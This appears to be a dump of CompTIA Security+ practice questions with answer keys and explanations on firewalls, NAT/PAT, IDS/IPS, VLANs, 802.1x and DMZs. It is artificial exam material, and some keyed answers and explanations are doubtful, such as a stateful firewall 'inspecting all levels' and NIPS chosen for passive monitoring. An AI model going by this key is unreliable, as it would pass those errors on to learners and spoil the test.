291 Cards in this Set


Sara, the security administrator, must configure the corporate firewall to allow all public IP addresses on the internal interface of the firewall to be translated to one public IP address on the external interface of the same firewall. Which of the following should Sara configure?


A. PAT


B. NAP


C. DNAT


D. NAC

Answer: A


Explanation: Port Address Translation (PAT) is an extension to network address translation (NAT) that permits multiple devices on a local area network (LAN) to be mapped to a single public IP address. The goal of PAT is to conserve IP addresses. Most home networks use PAT. In such a scenario, the Internet Service Provider (ISP) assigns a single IP address to the home network's router. When Computer X logs on to the Internet, the router assigns the client a port number, which is appended to the internal IP address. This, in effect, gives Computer X a unique address. If Computer Z logs on to the Internet at the same time, the router assigns it the same local IP address with a different port number. Although both computers are sharing the same public IP address and accessing the Internet at the same time, the router knows exactly which computer to send specific packets to because each computer has a unique internal address.

Which of the following devices is MOST likely being used when processing the following?

1 PERMIT IP ANY ANY EQ 80
2 DENY IP ANY ANY


A. Firewall


B. NIPS


C. Load balancer


D. URL filter

Answer: A


Explanation: Firewalls, routers, and even switches can use ACLs as a method of security management. Every access control list has an implicit deny ip any any at its end. ACLs deny by default and allow by exception.

The security administrator at ABC company received the following log information from an external party:




10:45:01 EST, SRC 10.4.3.7:3056, DST 8.4.2.1:80, ALERT, Directory traversal
10:45:02 EST, SRC 10.4.3.7:3057, DST 8.4.2.1:80, ALERT, Account brute force
10:45:03 EST, SRC 10.4.3.7:3058, DST 8.4.2.1:80, ALERT, Port scan




The external party is reporting attacks coming from abc-company.com. Which of the following is the reason the ABC company’s security administrator is unable to determine the origin of the attack?


A. A NIDS was used in place of a NIPS.


B. The log is not in UTC.


C. The external party uses a firewall.


D. ABC company uses PAT.

Answer: D


Explanation: PAT would ensure that computers on ABC’s LAN translate to the same IP address, but with a different port number assignment. The log information shows the IP address, not the port number, making it impossible to pinpoint the exact source.

Which of the following security devices can be replicated on a Linux based computer using IP tables to inspect and properly handle network based traffic?


A. Sniffer


B. Router


C. Firewall


D. Switch

Answer: C


Explanation: iptables is a user-space application program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores.

Which of the following firewall types inspects Ethernet traffic at the MOST levels of the OSI model?


A. Packet Filter Firewall


B. Stateful Firewall


C. Proxy Firewall


D. Application Firewall

Answer: B


Explanation: Stateful inspections occur at all levels of the network.

The Chief Information Security Officer (CISO) has mandated that all IT systems with credit card data be segregated from the main corporate network to prevent unauthorized access and that access to the IT systems should be logged. Which of the following would BEST meet the CISO’s requirements?


A. Sniffers


B. NIDS


C. Firewalls


D. Web proxies


E. Layer 2 switches

Answer: C


Explanation: The basic purpose of a firewall is to isolate one network from another.

Which of the following network design elements allows for many internal devices to share one public IP address?


A. DNAT


B. PAT


C. DNS


D. DMZ

Answer: B


Explanation: Port Address Translation (PAT) is an extension to network address translation (NAT) that permits multiple devices on a local area network (LAN) to be mapped to a single public IP address. The goal of PAT is to conserve IP addresses. Most home networks use PAT. In such a scenario, the Internet Service Provider (ISP) assigns a single IP address to the home network's router. When Computer X logs on to the Internet, the router assigns the client a port number, which is appended to the internal IP address. This, in effect, gives Computer X a unique address. If Computer Z logs on to the Internet at the same time, the router assigns it the same local IP address with a different port number. Although both computers are sharing the same public IP address and accessing the Internet at the same time, the router knows exactly which computer to send specific packets to because each computer has a unique internal address.

Which of the following is a best practice when securing a switch from physical access?


A. Disable unnecessary accounts


B. Print baseline configuration


C. Enable access lists


D. Disable unused ports

Answer: D


Explanation: Disabling unused switch ports is a simple method many network administrators use to help secure their network from unauthorized access. All ports not in use should be disabled. Otherwise, they present an open door for an attacker to enter.

Which of the following devices would be MOST useful to ensure availability when there are a large number of requests to a certain website?


A. Protocol analyzer


B. Load balancer


C. VPN concentrator


D. Web security gateway

Answer: B


Explanation: Load balancing refers to shifting a load from one device to another. A load balancer can be implemented as a software or hardware solution, and it is usually associated with a device such as a router, a firewall, a NAT appliance, and so on. In its most common implementation, a load balancer splits the traffic intended for a website into individual requests that are then rotated to redundant servers as they become available.

Pete, the system administrator, wishes to monitor and limit users’ access to external websites. Which of the following would BEST address this?


A. Block all traffic on port 80.


B. Implement NIDS.


C. Use server load balancers.


D. Install a proxy server.

Answer: D


Explanation: A proxy is a device that acts on behalf of other(s). In the interest of security, all internal user interaction with the Internet should be controlled through a proxy server. The proxy server should automatically block known malicious sites. The proxy server should cache often-accessed sites to improve performance.

CompTIA SY0-401 Exam

Mike, a network administrator, has been asked to passively monitor network traffic to the company’s sales websites. Which of the following would be BEST suited for this task?


A. HIDS


B. Firewall


C. NIPS


D. Spam filter

Answer: C


Explanation: A network-based intrusion prevention system (NIPS) monitors the entire network for suspicious traffic by analyzing protocol activity.

Which of the following should be deployed to prevent the transmission of malicious traffic between virtual machines hosted on a singular physical device on a network?


A. HIPS on each virtual machine


B. NIPS on the network


C. NIDS on the network


D. HIDS on each virtual machine

Answer: A


Explanation: A host-based intrusion prevention system (HIPS) is an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host.

Pete, a security administrator, has observed repeated attempts to break into the network. Which of the following is designed to stop an intrusion on the network?


A. NIPS


B. HIDS


C. HIPS


D. NIDS

Answer: A


Explanation: A network-based intrusion prevention system (NIPS) monitors the entire network for suspicious traffic by analyzing protocol activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, attempt to block/stop it, and report it.

An administrator is looking to implement a security device which will be able to not only detect network intrusions at the organization level, but help defend against them as well. Which of the following is being described here?


A. NIDS


B. NIPS


C. HIPS


D. HIDS

Answer: B


Explanation: A network-based intrusion prevention system (NIPS) monitors the entire network for suspicious traffic by analyzing protocol activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, attempt to block/stop it, and report it.

In intrusion detection system vernacular, which account is responsible for setting the security policy for an organization?


A. Supervisor


B. Administrator


C. Root


D. Director

Answer: B


Explanation: The administrator is the person responsible for setting the security policy for an organization and is responsible for making decisions about the deployment and configuration of the IDS.

When performing the daily review of the system vulnerability scans of the network, Joe, the administrator, noticed several security related vulnerabilities with an assigned vulnerability identification number. Joe researches the assigned vulnerability identification number on the vendor website. Joe proceeds with applying the recommended solution for the identified vulnerability. Which of the following is the type of vulnerability described?


A. Network based


B. IDS


C. Signature based


D. Host based

Answer: C


Explanation: A signature-based monitoring or detection method relies on a database of signatures or patterns of known malicious or unwanted activity. The strength of a signature-based system is that it can quickly and accurately detect any event from its database of signatures.

The network security engineer just deployed an IDS on the network, but the Chief Technical Officer (CTO) has concerns that the device is only able to detect known anomalies. Which of the following types of IDS has been deployed?


A. Signature Based IDS


B. Heuristic IDS


C. Behavior Based IDS


D. Anomaly Based IDS

Answer: A


Explanation: A signature based IDS will monitor packets on the network and compare them against a database of signatures or attributes from known malicious threats.

Joe, the Chief Technical Officer (CTO), is concerned about new malware being introduced into the corporate network. He has tasked the security engineers to implement a technology that is capable of alerting the team when unusual traffic is on the network. Which of the following types of technologies will BEST address this scenario?


A. Application Firewall


B. Anomaly Based IDS


C. Proxy Firewall


D. Signature IDS

Answer: B


Explanation: Anomaly-based detection watches the ongoing activity in the environment and looks for abnormal occurrences. An anomaly-based monitoring or detection method relies on definitions of all valid forms of activity. This database of known valid activity allows the tool to detect any and all anomalies. Anomaly-based detection is commonly used for protocols. Because all the valid and legal forms of a protocol are known and can be defined, any variations from those known valid constructions are seen as anomalies.

Matt, an administrator, notices a flood of fragmented packets and retransmits from an email server. After disabling the TCP offload setting on the NIC, Matt sees normal traffic with packets flowing in sequence again. Which of the following utilities was he MOST likely using to view this issue?

A. Spam filter


B. Protocol analyzer


C. Web application firewall


D. Load balancer

Answer: B


Explanation: A protocol analyzer is a tool used to examine the contents of network traffic. Commonly known as a sniffer, a protocol analyzer can be a dedicated hardware device or software installed onto a typical host system. In either case, a protocol analyzer is first a packet capturing tool that can collect network traffic and store it in memory or onto a storage device. Once a packet is captured, it can be analyzed either with complex automated tools and scripts or manually.

Which of the following flags are used to establish a TCP connection? (Select TWO).


A. PSH


B. ACK


C. SYN


D. URG


E. FIN

Answer: B,C


Explanation: To establish a TCP connection, the three-way (or 3-step) handshake occurs:

SYN: The active open is performed by the client sending a SYN to the server. The client sets the segment's sequence number to a random value A.

SYN-ACK: In response, the server replies with a SYN-ACK. The acknowledgment number is set to one more than the received sequence number, i.e. A+1, and the sequence number that the server chooses for the packet is another random number, B.

ACK: Finally, the client sends an ACK back to the server. The sequence number is set to the received acknowledgement value, i.e. A+1, and the acknowledgement number is set to one more than the received sequence number, i.e. B+1.

Which of the following components of an all-in-one security appliance would MOST likely be configured in order to restrict access to peer-to-peer file sharing websites?


A. Spam filter


B. URL filter


C. Content inspection


D. Malware inspection

Answer: B


Explanation: The question asks how to prevent access to peer-to-peer file sharing websites. You access a website by browsing to a URL using a Web browser or peer-to-peer file sharing client software. A URL filter is used to block URLs (websites) to prevent users accessing the website.

Incorrect Answers:

A: A spam filter is used for email. All inbound (and sometimes outbound) email is passed through the spam filter to detect spam emails. The spam emails are then discarded or tagged as potential spam according to the spam filter configuration. Spam filters do not prevent users accessing peer-to-peer file sharing websites.

C: Content inspection is the process of inspecting the content of a web page as it is downloaded. The content can then be blocked if it doesn’t comply with the company’s web policy. Content control software determines what content will be available or, perhaps more often, what content will be blocked. Content inspection does not prevent users accessing peer-to-peer file sharing websites (although it could block the content of the sites as it is downloaded).

D: Malware inspection is the process of scanning a computer system for malware. Malware inspection does not prevent users accessing peer-to-peer file sharing websites.

Pete, the system administrator, wants to restrict access to advertisements, games, and gambling web sites. Which of the following devices would BEST achieve this goal?


A. Firewall


B. Switch


C. URL content filter


D. Spam filter

Answer: C


Explanation: URL filtering, also known as web filtering, is the act of blocking access to a site based on all or part of the URL used to request access. URL filtering can focus on all or part of a fully qualified domain name (FQDN), specific path names, specific filenames, specific file extensions, or entire specific URLs. Many URL-filtering tools can obtain updated master URL block lists from vendors as well as allow administrators to add or remove URLs from a custom list.

The administrator receives a call from an employee named Joe. Joe says the Internet is down and he is receiving a blank page when typing to connect to a popular sports website. The administrator asks Joe to try visiting a popular search engine site, which Joe reports as successful. Joe then says that he can get to the sports site on his phone. Which of the following might the administrator need to configure?


A. The access rules on the IDS


B. The pop up blocker in the employee’s browser


C. The sensitivity level of the spam filter


D. The default block page on the URL filter

Answer: D


Explanation: A URL filter is used to block access to a site based on all or part of a URL. There are a number of URL-filtering tools that can acquire updated master URL block lists from vendors, as well as allow administrators to add or remove URLs from a custom list.

Layer 7 devices used to prevent specific types of HTML tags are called:


A. Firewalls


B. Content filters


C. Routers


D. NIDS

Answer: B


Explanation: A content filter is a type of software designed to restrict or control the content a reader is authorised to access, particularly when used to limit material delivered over the Internet via the Web, e-mail, or other means. Because the user and the OSI layer interact directly with the content filter, it operates at Layer 7 of the OSI model.

Pete, an employee, attempts to visit a popular social networking site but is blocked. Instead, a page is displayed notifying him that this site cannot be visited. Which of the following is MOST likely blocking Pete’s access to this site?


A. Internet content filter


B. Firewall


C. Proxy server


D. Protocol analyzer

Answer: A


Explanation: Web filtering software is designed to restrict or control the content a reader is authorised to access, especially when utilised to restrict material delivered over the Internet via the Web, e-mail, or other means.

A review of the company’s network traffic shows that most of the malware infections are caused by users visiting gambling and gaming websites. The security manager wants to implement a solution that will block these websites, scan all web traffic for signs of malware, and block the malware before it enters the company network. Which of the following is suited for this purpose?

A. ACL


B. IDS


C. UTM


D. Firewall

Answer: C


Explanation: An all-in-one appliance, also known as Unified Threat Management (UTM) and Next Generation Firewall (NGFW), is one that provides a good foundation for security. A variety is available; those that you should be familiar with for the exam fall under the categories of providing URL filtering, content inspection, or malware inspection. Malware inspection is the use of a malware scanner to detect unwanted software content in network traffic. If malware is detected, it can be blocked or logged and/or trigger an alert.

Which of the following is BEST at blocking attacks and providing security at layer 7 of the OSI model?

A. WAF


B. NIDS


C. Routers


D. Switches

Answer: A


Explanation: A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified. As the protocols used to access a web server (typically HTTP and HTTPS) run in layer 7 of the OSI model, the web application firewall (WAF) is the correct answer.

Which of the following should the security administrator implement to limit web traffic based on country of origin? (Select THREE).


A. Spam filter


B. Load balancer


C. Antivirus


D. Proxies


E. Firewall


F. NIDS


G. URL filtering

Answer: D,E,G


Explanation: A proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers. Firewalls manage traffic using a rule or a set of rules. A URL is a reference to a resource that specifies the location of the resource. A URL filter is used to block access to a site based on all or part of a URL.

A security engineer is reviewing log data and sees the output below:


POST: /payload.php HTTP/1.1
HOST: localhost
Accept: */*
Referrer: http://localhost/
*******
HTTP/1.1 403 Forbidden
Connection: close




Log: Access denied with 403. Pattern matches form bypass

Which of the following technologies was MOST likely being used to generate this log?


A. Host-based Intrusion Detection System


B. Web application firewall


C. Network-based Intrusion Detection System


D. Stateful Inspection Firewall


E. URL Content Filter

Answer: B


Explanation: A web application firewall is a device, server add-on, virtual service, or system filter that defines a strict set of communication rules for a website and all visitors. It’s intended to be an application-specific firewall to prevent cross-site scripting, SQL injection, and other web application attacks.

An administrator would like to review the effectiveness of existing security in the enterprise. Which of the following would be the BEST place to start?


A. Review past security incidents and their resolution


B. Rewrite the existing security policy


C. Implement an intrusion prevention system


D. Install honey pot systems

Answer: C


Explanation: The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, attempt to block/stop it, and report it.

A company has proprietary mission critical devices connected to their network which are configured remotely by both employees and approved customers. The administrator wants to monitor device security without changing their baseline configuration. Which of the following should be implemented to secure the devices without risking availability?


A. Host-based firewall


B. IDS


C. IPS


D. Honeypot

Answer: B


Explanation: An intrusion detection system (IDS) is a device or software application that monitors network or system activities for malicious activities or policy violations and produces reports to a management station. IDS come in a variety of “flavors” and approach the goal of detecting suspicious traffic in different ways. There are network based (NIDS) and host based (HIDS) intrusion detection systems. Some systems may attempt to stop an intrusion attempt but this is neither required nor expected of a monitoring system. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, and reporting attempts. In addition, organizations use IDPSes for other purposes, such as identifying problems with security policies, documenting existing threats and deterring individuals from violating security policies. IDPSes have become a necessary addition to the security infrastructure of nearly every organization. IDPSes typically record information related to observed events, notify security administrators of important observed events and produce reports. Many IDPSes can also respond to a detected threat by attempting to prevent it from succeeding. They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g. reconfiguring a firewall) or changing the attack's content.

Which of the following firewall rules only denies DNS zone transfers?


A. deny udp any any port 53


B. deny ip any any


C. deny tcp any any port 53


D. deny all dns packets

Answer: C


Explanation: DNS operates over TCP and UDP port 53. TCP port 53 is used for zone transfers.

A security administrator suspects that an increase in the amount of TFTP traffic on the network is due to unauthorized file transfers, and wants to configure a firewall to block all TFTP traffic. Which of the following would accomplish this task?


A. Deny TCP port 68


B. Deny TCP port 69


C. Deny UDP port 68


D. Deny UDP port 69

Answer: D


Explanation: Trivial File Transfer Protocol (TFTP) is a simple file-exchange protocol that doesn’t require authentication. It operates on UDP port 69.

Sara, a security technician, has received notice that a vendor coming in for a presentation will require access to a server outside of the network. Currently, users are only able to access remote sites through a VPN connection. How could Sara BEST accommodate the vendor?




A. Allow incoming IPSec traffic into the vendor’s IP address.




B. Set up a VPN account for the vendor, allowing access to the remote site.




C. Turn off the firewall while the vendor is in the office, allowing access to the remote site.




D. Write a firewall rule to allow the vendor to have access to the remote site.

Answer: D


Explanation: Firewall rules are used to define what traffic is able to pass between the firewall and the internal network. Firewall rules block the connection, allow the connection, or allow the connection only if it is secured. Firewall rules can be applied to inbound traffic or outbound traffic and any type of network.

A technician is deploying virtual machines for multiple customers on a single physical host to reduce power consumption in a data center. Which of the following should be recommended to isolate the VMs from one another?


A. Implement a virtual firewall


B. Install HIPS on each VM


C. Virtual switches with VLANs


D. Develop a patch management guide

Answer: C


Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs are used for traffic management. VLANs can be used to isolate traffic between network segments.

A router has a single Ethernet connection to a switch. In the router configuration, the Ethernet interface has three sub-interfaces, each configured with ACLs applied to them and 802.1q trunks. Which of the following is MOST likely the reason for the sub-interfaces?




A. The network uses the subnet of 255.255.255.128.




B. The switch has several VLANs configured on it.




C. The sub-interfaces are configured for VoIP traffic.




D. The sub-interfaces each implement quality of service.

Answer: B


Explanation: A subinterface is a division of one physical interface into multiple logical interfaces. Routers commonly employ subinterfaces for a variety of purposes, the most common being routing traffic between VLANs. Also, IEEE 802.1Q is the networking standard that supports virtual LANs (VLANs) on an Ethernet network.

Joe, a technician at the local power plant, notices that several turbines had ramped up in cycles during the week. Further investigation by the system engineering team determined that a timed.exe file had been uploaded to the system control console during a visit by international contractors. Which of the following actions should Joe recommend?




A. Create a VLAN for the SCADA


B. Enable PKI for the MainFrame


C. Implement patch management


D. Implement stronger WPA2 Wireless

Answer: A


Explanation: VLANs are used for traffic management. VLANs can be used to isolate traffic between network segments. This can be accomplished by not defining a route between different VLANs or by specifying a deny filter between certain VLANs (or certain members of a VLAN). Any network segment that doesn’t need to communicate with another in order to accomplish a work task/function shouldn’t be able to do so.

The security administrator needs to manage traffic on a layer 3 device to support FTP from a new remote site. Which of the following would need to be implemented?




A. Implicit deny


B. VLAN management


C. Port security


D. Access control lists

Answer: D


Explanation: In the OSI model, IP addressing and IP routing are performed at layer 3 (the network layer). In this question we need to configure routing. When configuring routing, you specify which IP range (in this case, the IP subnet of the remote site) is allowed to route traffic through the router to the FTP server.

Traffic that comes into the router is compared to ACL entries based on the order that the entries occur in the router. New statements are added to the end of the list. The router continues to look until it has a match. If no matches are found when the router reaches the end of the list, the traffic is denied. For this reason, you should have the frequently hit entries at the top of the list. There is an implied deny for traffic that is not permitted.

Matt, the network engineer, has been tasked with separating network traffic between virtual machines on a single hypervisor. Which of the following would he implement to BEST address this requirement? (Select TWO).




A. Virtual switch


B. NAT


C. System partitioning


D. Access-list


E. Disable spanning tree


F. VLAN

Answer: A,F


Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. A virtual switch is a software application that allows communication between virtual machines. A combination of the two would best satisfy the question.

A database administrator contacts a security administrator to request firewall changes for a connection to a new internal application. The security administrator notices that the new application uses a port typically monopolized by a virus. The security administrator denies the request and suggests a new port or service be used to complete the application’s task. Which of the following is the security administrator practicing in this example?




A. Explicit deny


B. Port security


C. Access control lists


D. Implicit deny

Answer: C


Explanation: Traffic that comes into the router is compared to ACL entries based on the order that the entries occur in the router. New statements are added to the end of the list. The router continues to look until it has a match. If no matches are found when the router reaches the end of the list, the traffic is denied. For this reason, you should have the frequently hit entries at the top of the list. There is an implied deny for traffic that is not permitted.

An administrator needs to connect a router in one building to a router in another using Ethernet. Each router is connected to a managed switch and the switches are connected to each other via a fiber line. Which of the following should be configured to prevent unauthorized devices from connecting to the network?



A. Configure each port on the switches to use the same VLAN other than the default one




B. Enable VTP on both switches and set to the same domain




C. Configure only one of the routers to run DHCP services




D. Implement port security on the switches

Answer: D


Explanation: Port security in IT can mean several things:

The physical control of all connection points, such as RJ-45 wall jacks or device ports, so that no unauthorized users or unauthorized devices can attempt to connect into an open port.

The management of TCP and User Datagram Protocol (UDP) ports. If a service is active and assigned to a port, then that port is open. All the other 65,535 ports (of TCP or UDP) are closed if a service isn’t actively using them. Port knocking is a security system in which all ports on a system appear closed. However, if the client sends packets to a specific set of ports in a certain order, a bit like a secret knock, then the desired service port becomes open and allows the client software to connect to the service.

At an organization, unauthorized users have been accessing network resources via unused network wall jacks. Which of the following would be used to stop unauthorized access?




A. Configure an access list.


B. Configure spanning tree protocol.


C. Configure port security.


D. Configure loop protection

Answer: C


Explanation: Port security in IT can mean several things. It can mean the physical control of all connection points, such as RJ-45 wall jacks or device ports, so that no unauthorized users or unauthorized devices can attempt to connect into an open port. This can be accomplished by locking down the wiring closet and server vaults and then disconnecting the workstation run from the patch panel (or punch-down block) that leads to a room’s wall jack. Any unneeded or unused wall jacks can (and should) be physically disabled in this manner. Another option is to use a smart patch panel that can monitor the MAC address of any device connected to each and every wall port across a building and detect not just when a new device is connected to an empty port, but also when a valid device is disconnected or replaced by an invalid device.

On Monday, all company employees report being unable to connect to the corporate wireless network, which uses 802.1x with PEAP. A technician verifies that no configuration changes were made to the wireless network and its supporting infrastructure, and that there are no outages. Which of the following is the MOST likely cause for this issue?




A. Too many incorrect authentication attempts have caused users to be temporarily disabled.




B. The DNS server is overwhelmed with connections and is unable to respond to queries.




C. The company IDS detected a wireless attack and disabled the wireless network.




D. The Remote Authentication Dial-In User Service server certificate has expired.

Answer: D


Explanation: The question states that the network uses 802.1x with PEAP. The 802.1x authentication server is typically an EAP-compliant Remote Access Dial-In User Service (RADIUS). A RADIUS server will be configured with a digital certificate. When a digital certificate is created, an expiration period is configured by the Certificate Authority (CA). The expiration period is commonly one or two years. The question states that no configuration changes have been made, so it’s likely that the certificate has expired.

A company determines a need for additional protection from rogue devices plugging into physical ports around the building. Which of the following provides the highest degree of protection from unauthorized wired network access?




A. Intrusion Prevention Systems


B. MAC filtering


C. Flood guards


D. 802.1x

Answer: D


Explanation: IEEE 802.1x is an IEEE Standard for Port-based Network Access Control (PNAC). It is part of the IEEE 802.1 group of networking protocols and provides an authentication mechanism to wireless devices connecting to a LAN or WLAN.

While configuring a new access layer switch, the administrator, Joe, was advised that he needed to make sure that only devices authorized to access the network would be permitted to login and utilize resources. Which of the following should the administrator implement to ensure this happens?




A. Log Analysis


B. VLAN Management


C. Network separation


D. 802.1x

Answer: D


Explanation: 802.1x is a port-based authentication mechanism. It’s based on Extensible Authentication Protocol (EAP) and is commonly used in closed-environment wireless networks. 802.1x was initially used to compensate for the weaknesses of Wired Equivalent Privacy (WEP), but today it’s often used as a component in more complex authentication and connection-management systems, including Remote Authentication Dial-In User Service (RADIUS), Diameter, Cisco System’s Terminal Access Controller Access-Control System Plus (TACACS+), and Network Access Control (NAC).

A network administrator wants to block both DNS requests and zone transfers coming from outside IP addresses. The company uses a firewall which implements an implicit allow and is currently configured with the following ACL applied to its external interface.

PERMIT TCP ANY ANY 80

PERMIT TCP ANY ANY 443

Which of the following rules would accomplish this task? (Select TWO).




A. Change the firewall default settings so that it implements an implicit deny




B. Apply the current ACL to all interfaces of the firewall




C. Remove the current ACL




D. Add the following ACL at the top of the current ACL: DENY TCP ANY ANY 53




E. Add the following ACL at the bottom of the current ACL: DENY ICMP ANY ANY 53




F. Add the following ACL at the bottom of the current ACL: DENY IP ANY ANY 53

Answer: A,F


Explanation: Implicit deny is the default security stance that says if you aren’t specifically granted access or privileges for a resource, you’re denied access by default. Implicit deny is the default response when an explicit allow or deny isn’t present. DNS operates over TCP and UDP port 53. TCP port 53 is used for zone transfers. These are zone file exchanges between DNS servers, special manual queries, or used when a response exceeds 512 bytes. UDP port 53 is used for most typical DNS queries.

Users are unable to connect to the web server at IP 192.168.0.20. Which of the following can be inferred of a firewall that is configured ONLY with the following ACL?




PERMIT TCP ANY HOST 192.168.0.10 EQ 80

PERMIT TCP ANY HOST 192.168.0.10 EQ 443




A. It implements stateful packet filtering.


B. It implements bottom-up processing.


C. It failed closed.


D. It implements an implicit deny.

Answer: D


Explanation: Implicit deny is the default security stance that says if you aren’t specifically granted access or privileges for a resource, you’re denied access by default. Implicit deny is the default response when an explicit allow or deny isn’t present.

The Human Resources department has a parent shared folder setup on the server. There are two groups that have access, one called managers and one called staff. There are many sub folders under the parent shared folder, one is called payroll. The parent folder access control list propagates all subfolders and all subfolders inherit the parent permission. Which of the following is the quickest way to prevent the staff group from gaining access to the payroll folder?




A. Remove the staff group from the payroll folder


B. Implicit deny on the payroll folder for the staff group


C. Implicit deny on the payroll folder for the managers group


D. Remove inheritance from the payroll folder

Answer: B


Explanation: Implicit deny is the default security stance that says if you aren’t specifically granted access or privileges for a resource, you’re denied access by default.

A company has several conference rooms with wired network jacks that are used by both employees and guests. Employees need access to internal resources and guests only need access to the Internet. Which of the following combinations is BEST to meet the requirements?


A. NAT and DMZ


B. VPN and IPSec


C. Switches and a firewall


D. 802.1x and VLANs

Answer: D


Explanation: 802.1x is a port-based authentication mechanism. It’s based on Extensible Authentication Protocol (EAP) and is commonly used in closed-environment wireless networks. 802.1x was initially used to compensate for the weaknesses of Wired Equivalent Privacy (WEP), but today it’s often used as a component in more complex authentication and connection-management systems, including Remote Authentication Dial-In User Service (RADIUS), Diameter, Cisco System’s Terminal Access Controller Access-Control System Plus (TACACS+), and Network Access Control (NAC). A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. By default, all ports on a switch are part of VLAN 1. But as the switch administrator changes the VLAN assignment on a port-by-port basis, various ports can be grouped together and be distinct from other VLAN port designations. VLANs are used for traffic management. Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function.

Matt, the IT Manager, wants to create a new network available to virtual servers on the same hypervisor, and does not want this network to be routable to the firewall. How could this BEST be accomplished?




A. Create a VLAN without a default gateway.


B. Remove the network from the routing table.


C. Create a virtual switch.


D. Commission a stand-alone switch

Answer: C


Explanation: A Hyper-V Virtual Switch implements policy enforcement for security, isolation, and service levels.

A Chief Information Security Officer (CISO) is tasked with outsourcing the analysis of security logs. These will need to still be reviewed on a regular basis to ensure the security of the company has not been breached. Which of the following cloud service options would support this requirement?




A. SaaS


B. MaaS


C. IaaS


D. PaaS

Answer: B


Explanation: Monitoring-as-a-service (MaaS) is a cloud delivery model that falls under anything as a service (XaaS). MaaS allows for the deployment of monitoring functionalities for several other services and applications within the cloud.

Joe, a security administrator, believes that a network breach has occurred in the data center as a result of a misconfigured router access list, allowing outside access to an SSH server. Which of the following should Joe search for in the log files?




A. Failed authentication attempts


B. Network ping sweeps


C. Host port scans


D. Connections to port 22

Answer: D


Explanation: Log analysis is the art and science of reviewing audit trails, log files, or other forms of computer generated records for evidence of policy violations, malicious events, downtimes, bottlenecks, or other issues of concern. SSH uses TCP port 22. All protocols encrypted by SSH also use TCP port 22, such as SFTP, SHTTP, SCP, SExec, and slogin.

An organization does not have adequate resources to administer its large infrastructure. A security administrator wishes to combine the security controls of some of the network devices in the organization. Which of the following methods would BEST accomplish this goal?




A. Unified Threat Management


B. Virtual Private Network


C. Single sign on


D. Role-based management

Answer: A


Explanation: When you combine a firewall with other abilities (intrusion prevention, antivirus, content filtering, etc.), what used to be called an all-in-one appliance is now known as a unified threat management (UTM) system. The advantages of combining everything into one include a reduced learning curve (you only have one product to learn), a single vendor to deal with, and, typically, reduced complexity.

An organization does not have adequate resources to administer its large infrastructure. A security administrator wishes to integrate the security controls of some of the network devices in the organization. Which of the following methods would BEST accomplish this goal?




A. Unified Threat Management


B. Virtual Private Network


C. Single sign on


D. Role-based management

Answer: A


Explanation: Unified Threat Management (UTM) is, basically, the combination of a firewall with other abilities. These abilities include intrusion prevention, antivirus, content filtering, etc. Advantages of combining everything into one: you only have one product to learn; you only have to deal with a single vendor; it provides reduced complexity.

A security administrator is segregating all web-facing server traffic from the internal network and restricting it to a single interface on a firewall. Which of the following BEST describes this new network?




A. VLAN


B. Subnet


C. VPN


D. DMZ

Answer: D


Explanation: A DMZ or demilitarized zone (sometimes referred to as a perimeter network) is a physical or logical subnetwork that contains and exposes an organization's external-facing services to a larger and untrusted network, usually the Internet. The purpose of a DMZ is to add an additional layer of security to an organization's local area network (LAN); an external network node only has direct access to equipment in the DMZ, rather than any other part of the network. The name is derived from the term "demilitarized zone", an area between nation states in which military operation is not permitted.

Which of the following devices would MOST likely have a DMZ interface?




A. Firewall


B. Switch


C. Load balancer


D. Proxy

Answer: A


Explanation: The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall.

A security analyst needs to ensure all external traffic is able to access the company’s front-end servers but protect all access to internal resources. Which of the following network design elements would MOST likely be recommended?


A. DMZ


B. Cloud computing


C. VLAN


D. Virtualization

Answer: A


Explanation: A demilitarized zone (DMZ) is an area of a network that is designed specifically for public users to access. The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall.

Which of the following network architecture concepts is used to securely isolate at the boundary between networks?




A. VLAN


B. Subnetting


C. DMZ


D. NAT

Answer: C


Explanation: A demilitarized zone (DMZ) is an area of a network that is designed specifically for public users to access. The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall.

When designing a new network infrastructure, a security administrator requests that the intranet web server be placed in an isolated area of the network for security purposes. Which of the following design elements would be implemented to comply with the security administrator’s request?




A. DMZ


B. Cloud services


C. Virtualization


D. Sandboxing

Answer: A


Explanation: A demilitarized zone (DMZ) is an area of a network that is designed specifically for public users to access. The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall.

Which of the following BEST describes a demilitarized zone?




A. A buffer zone between protected and unprotected networks.




B. A network where all servers exist and are monitored.




C. A sterile, isolated network segment with access lists.




D. A private network that is protected by a firewall and a VLAN.

Answer: A


Explanation: A demilitarized zone (DMZ) is an area of a network that is designed specifically for public users to access. The DMZ is a buffer network between the public untrusted Internet and the private trusted LAN. Often a DMZ is deployed through the use of a multihomed firewall.

Which of the following would allow the organization to divide a Class C IP address range into several ranges?




A. DMZ


B. Virtual LANs


C. NAT


D. Subnetting

Answer: D


Explanation: Subnetting is a dividing process used on networks to divide larger groups of hosts into smaller collections.

Which of the following IP addresses would be hosts on the same subnet given the subnet mask 255.255.255.224? (Select TWO).




A. 10.4.4.125


B. 10.4.4.158


C. 10.4.4.165


D. 10.4.4.189


E. 10.4.4.199

Answer: C,D


